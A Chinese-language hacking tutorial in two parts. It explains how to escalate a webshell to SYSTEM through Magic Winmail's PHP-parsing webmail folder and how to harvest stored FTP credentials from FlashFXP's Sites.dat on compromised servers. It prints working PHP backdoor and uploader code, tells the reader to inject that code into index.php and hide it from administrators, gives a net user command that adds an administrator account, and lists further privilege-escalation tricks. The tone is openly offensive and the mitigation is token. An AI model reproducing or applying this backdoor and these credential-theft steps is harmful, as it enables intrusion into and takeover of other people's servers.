一．使用Magic Winmail 來提升權(quán)限

原創(chuàng):lis0
環(huán)境:所有使用了Magic Winmail軟件的服務(wù)器，前提你已經(jīng)得到了一個webshell :)

Magic Winmail是一款很不錯的mail server 軟件，深受不少網(wǎng)站的青睞。主要是一些中小的網(wǎng)站。但是在筆者最近的一次滲透中發(fā)現(xiàn)，裝有改軟件的服務(wù)器，如果一旦被入侵者得到webshell就可以通過這個軟件來提升權(quán)限，非常危險。
裝有Magic Winmail的服務(wù)器會在系統(tǒng)上開啟8080端口，對外提供郵件服務(wù)。使用過它的人應(yīng)該知道。這個Magic Winmail服務(wù)器支持php腳本解析。圖1
http://www.bjtaekwondo.org.cn/liso/data/upfile/51_3_1089427435.gif
在裝有Magic Winmail的文件夾下有
一個server的文件夾，其下有webmail文件夾。圖2
http://www.bjtaekwondo.org.cn/liso/data/upfile/52_3_1089427458.gif
大家可以發(fā)現(xiàn)這個文件夾下是一些php腳本的文件。因為Magic Winmail這個軟件可以解析php腳本，也真是我們利用這個漏洞來提升權(quán)限的得力幫手。發(fā)現(xiàn)這個方法實屬偶然，本來我想在這個服務(wù)器上裝個后門，怎么裝呢? 由于本人思路比較怪。一般不會使用常規(guī)的方法，就在這個服務(wù)器8080端口上打主意了。這個Magic Winmail就是最佳地點。你在d:\MagicW~1\server\webmail[我測試的機器上的物理路徑]文件下隨便放置php腳本，不管是腳本注入式的還是普通的php腳本，隨便放! 而且lis0提示請放心大膽使用，不會有日志嗎? 菜鳥了吧。一般系統(tǒng)被入侵，管理員到系統(tǒng)盤下又是md5校驗又是腳本木馬查殺的。他做夢也想不到我們的腳本會放在這個文件夾下，lis0推薦使用注入式的腳本或者是自己寫的不被殺毒軟件能K的腳本。我哪個腳本? Lis0使用的是angel寫的一個up.php，又插入了一點東西。玩的時候，上傳個自己修改過的腳本或者其它東東，很方便。日志呢?當然還是有的。不過還是在Magic Winmail文件夾下，到目前為止能到這個文件夾下查看日志的網(wǎng)管還真的是不多，除非看了這篇文章 :)
up.php的codz
<?
if ($id=="1"){
system($cmd);
show_source($file);
copy($a,$b);unlink($a);
}
?>
<?
$fname = $_FILES['MyFile']['name'];
$do = copy($_FILES['MyFile']['tmp_name'],$fname);
if ($do)
{
echo"上傳成功<p>";
echo "http://".$SERVER_NAME."".dirname($PHP_SELF)."/".$fname."";
} else {
echo "上傳失敗";
}
?>
<form ENCTYPE="multipart/form-data" ACTION="<?php echo"".$PHP_SELF.""; ?>" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE="提交" TYPE="submit">
</from>
其實我們可以將如下的代碼插入到Magic Winmail的index.php文件中去，它的功能已經(jīng)構(gòu)多了。加上lis0發(fā)現(xiàn)的漏洞。這就算是個最完美的后門了。
<?
if ($id=="1"){
system($cmd);
show_source($file);
copy($a,$b);unlink($a);
}
?>
我們使用http://www.target.com:8080/index.php?id=1&YY＝XX 就可以正大光明地訪問我們的肉雞了。好像這樣做太黑了點:)
還沒說漏洞呢?廢話多了。將一個php的腳本放在d:\MagicW~1\server\webmail下，圖3
http://www.bjtaekwondo.org.cn/liso/data/upfile/53_3_1089427486.gif
然后正大光明地 net user lis0 lis0 /add & net localgroup administrators lis0 /add 這個就是哥們發(fā)現(xiàn)的漏洞，不相信, 讓肉雞來證明我說的是沒錯的啊。圖4
http://www.bjtaekwondo.org.cn/liso/data/upfile/54_3_1089427600.gif
lis0"非常不情愿"給告訴你這個webshell是system級別的而不是你那個guest級別的東西。雖然同是webshell待遇卻不同啊。至于你想要玩其它的東東的話，使用上面我提起的up.php上傳應(yīng)該是不成問題的。然后在腳本的那個可愛的小框框中執(zhí)行就ok了
如果使用asp腳本可以提升限權(quán)嗎? 也放在Magic Winmail那個文件夾下。
我們可以分析一下如果Magic Winmail可以同時解析php和asp腳本的話，應(yīng)該是可以的。不好意思Magic Winmail是不可以解析asp腳本的，Magic Winmail這邊是php的世界。
我們這邊簡單地分析一個這個漏洞是如何產(chǎn)生的?我們可愛的網(wǎng)管在裝Magic Winmail的時候肯定是以system級別的身份裝的。當然Magic Winmail就繼承了system級別的限權(quán)，而我們的Magic Winmail卻可以解析php腳本，想當然我們可愛的php腳本就是system級別的腳本了。這個Magic Winmail軟件有點像咱國產(chǎn)Netbox的味道。
看看我們分析的對不對，于是我上傳了個php探針，看看它到底是怎么回事情。
圖5 http://www.bjtaekwondo.org.cn/liso/data/upfile/56_3_1089427756.gif
看到了沒~乖乖
system級別的 & 而且無被禁函數(shù) & 允許/最大 32M & lis0高興ing。我個人認為這個一個最完美的php腳本后門放置地點，隨意發(fā)揮你的php才華。好了就這么多了，希望能對大家滲透有所幫助。


解決方法:將Magic Winmail所在盤作相應(yīng)處理，限制guest限權(quán)的用戶訪問。
聲明：由于該方法對于不少人來說可謂是一大驚喜，放置后門加提升限權(quán)可能帶來不良影響。所作的測試的腳本已經(jīng)完全刪除。無聊人士請勿對號入座。


二．使用FlashFXP來提升權(quán)限

作者： lis0

最近各位一定得到不少肉雞吧:)，從前段時間的動網(wǎng)的upfile漏洞， 動力文章系統(tǒng)最新漏洞到first see發(fā)現(xiàn)的動網(wǎng)sql版本的一個超級大漏洞。有人一定忙的不易樂乎，大家的方法也不過是使用一下asp腳本的后門罷了。至于提升權(quán)限的問題 呵呵，很少有人能作一口氣完成。關(guān)鍵還是在提升權(quán)限上做個問題上，不少服務(wù)器設(shè)置的很BT，你的asp木馬可能都用不了，還那里來的提升啊。我們得到webshell也就是個低級別的用戶的權(quán)限，各種提升權(quán)限方法是可謂五花八門啊，如何提升就看你自己的妙招了。
其一，如果服務(wù)器上有裝了pcanywhere服務(wù)端，管理員為了便于管理也給了我們方便，到系統(tǒng)盤的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere連接就ok了。
其二，如果對方有Serv-U大家不要罵我啊，通過修改ServUDaemon.ini和fpipe這軟件提升權(quán)限應(yīng)該是不成問題吧。
其三，通過替換系統(tǒng)服務(wù)來提升。
其四，查找conn和config這類型的文件看能否得到sa或者mysql的相關(guān)密碼，可能會有所收獲等等。
本人在一次無聊的入侵過程中發(fā)現(xiàn)了這個方法，使用Flashfxp也能提升權(quán)限，但是成功率高不高就看你自己的運氣了:)
本人在www.xxx.com 通過bbs得到了一個webshell，放了個小馬(現(xiàn)在海陽的名氣太大了偶不敢放)，而且已經(jīng)將一段代碼插入了N個文件中，夠黑吧。提升權(quán)限沒時間做。在我放假回家后，一看我暈bbs升級到動網(wǎng)sp2了我放的小馬也被K了，人家的BBS是access版本的。郁悶啊！突然想起我將一個頁面插入了asp的后門，看看還有沒有希望了。輸入www.xxx.com/xx.asp?id=1 好家伙，還在！高興ing
圖1
于是上傳了一個asp的腳本的后門，怎么提升權(quán)限呢?
在這個網(wǎng)站的主機上游蕩了N分鐘，在C:\ Program Files下發(fā)現(xiàn)了FlashFXP文件夾(跟我一樣使用這個軟件自己心里暗想)圖2，于是就打了了Sites. dat這個文件(編輯)這是什么東西密碼和用戶名，而且密碼是加了密的。
如果我把這些文件copy回本地也就是我的計算機中，替換我本地的相應(yīng)文件會怎么樣呢?
于是我就將Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak幾個文件下載到我的計算機中替換了我電腦中flashfxp文件夾的相應(yīng)文件。打開flashfxp在站點中打開站點管理器一項。乖 乖發(fā)財了
對方管理員通過flashfxp連接的各個站點都在圖3，點擊連接。通過了于是我們又有了一堆肉雞，我們有ftp權(quán)限。上傳腳本木馬~ 呵呵。
說了半天這提升權(quán)限的事情一點沒講啊
不要急，大家看看對方管理員的這站點管理器，有用戶名和密碼，密碼是星號的。可惜啊！
又想起了在Sites.dat中也顯示了密碼和用戶名，而且密碼是加密的。
現(xiàn)在的星號密碼會不會也是加了密的?看看就行了唄。
怎么看? 菜鳥了吧 手頭有個不錯的查看星號的軟件，就是xp星號密碼查看器，通過查看跟Sites.dat中加密了密碼做比較。看圖4和圖5 的比較 很顯然在站點管理器中查看到的密碼是明文顯示的。發(fā)財了吧
下一步就是使用xp星號密碼查看器這個軟件來提取密碼和用戶名。看者這些復(fù)雜的密碼，還真有點懷念當年玩sniff的時光。呵呵
密碼為:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用戶名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密碼和用戶名已經(jīng)作了必要的修改)
這么多的信息，按社會工程學(xué)的概念來說，沒有管理員的密碼。打死我也不相信。最終我得到了這個網(wǎng)站管理員的密碼從這堆東西中找到的。
我想這個問題應(yīng)該反饋到flashfxp官方，讓他們在下個版本中修正這個漏洞或者說是錯誤。經(jīng)過后來測試只要把含有密碼和用戶名的Sites.dat文件替換到本地相應(yīng)的文件就可以在本地還原對方管理員的各個站點的密碼。希望大家在入侵的時候遇到flashfxp的時候能想到這個方法，至少也可以得到一堆新的肉雞。不防試試?希望能給大家滲透帶來幫助